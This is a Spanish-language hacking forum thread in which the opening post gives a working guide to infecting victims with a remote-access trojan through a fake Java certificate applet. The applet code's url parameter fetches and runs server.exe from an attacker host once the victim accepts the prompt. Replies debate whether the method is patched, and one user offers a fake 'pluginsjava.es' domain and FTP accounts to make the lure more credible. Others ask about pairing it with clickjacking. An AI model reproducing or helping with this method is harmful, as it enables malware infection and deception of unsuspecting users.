Bueno les vengo con esta guia que la probe y me andubo a la perfeccion y se las traigo para ustedes.
1- Primero que nada necesitamos un Troyano, ya sea CyberGate, Spy-Net, Bifrost o el que quieran.
2- Un servidor de descarga DIRECTA, este es el mejor: http://anyhub.net/
3- Una animacion flash, un script html y un certificado falso de Java aqui lo tienen elijan el servidor que quieran para descargarlo: http://megaupper.com/files/1OUVSQSD/Java-fake.zip
4- Ahora cambian esta parte del code por su URL sel server:
<applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
<param name="url" value="http://tu-web.com/server.exe">
</applet>
Cambian esto:
http://tu-web.com/server.exe
IMPORTANTE: DEBEN TENER UN HOST PARA ALOJAR TODOS LOS ARCHIVOS.
Al aceptar el certificado automaticamente se les baja el server y se lo ejecuta a la victima.
Saludos.
Excelente post!
Pero esto ya no funciona ya fue parcheado.
En caso de que este errado y alguien lo haya probado actualmente y le haya funcionado por favor que lo haga saber.
Saludos y gracias por traerlo Neekiinh0
bueno a mi no me funciona, creo que codeare un poco aver si logro areglarlo.
ohhhhh :O vas a codear esto XDDDD ???----> <applet name="link" code="Inicio.class" archive="link.jar" height="10" width="1">
<param name="url" value="http://tu-web.com/server.exe">
</applet>
jajaj que me caigo :D
Dios que de tiempo... yo hasta tengo un dominio fake para que apareciera de remitente: pluginsjava.es
Ahora que lo pienso puedo proporcionar cuentas ftp y subdominio de ese mismo domain... ex: server01.pluginsjava.es xD cosas por el estilo para que sea más creible ^^
Quien quiera que me contacte por MP xD
PD: Buen aporte, creí que estaba por el foro por eso no lo posteaba...
Saludos
Pero seguimos dando vuelta en lo mismo! Esto no funiona ya!!! xD
xDDD no lo leí sorry... y hasta ahora no sabia que fué parcheado, fue bonito mientras duró xD!
A Mi Me Funciona Lo eh probado con todos los SO esta detectado eso se pero sigue funcionando.
Si funciona xDDDDD muchos lo usan con el clickjacking :l
No tienes permitido ver los links.
Registrarse o Entrar a mi cuenta
Si funciona xDDDDD muchos lo usan con el clickjacking :l
Hola disculpa las molestias.
Estube viendo eso de click jacking y queria ver como es el tema justamente para implementarlo con el JavaFake.
Ya que si se utiliza con el Js de JavaFake el cartel saldria no de la web iframe sino en la web principal, en la capa principal del clickjacking y donde aparece nuestro boton.
¿Alguien a implementado el Método con clickjacking y JavaFake?
Gracias por las respuestas. Saludos a todos
el metodo aún funciona pero es detectado por los AV´s
Gracias No Entiendo Bien unso Dicen qe Si Funciona Otros Que No? xD
Toca Ver =D!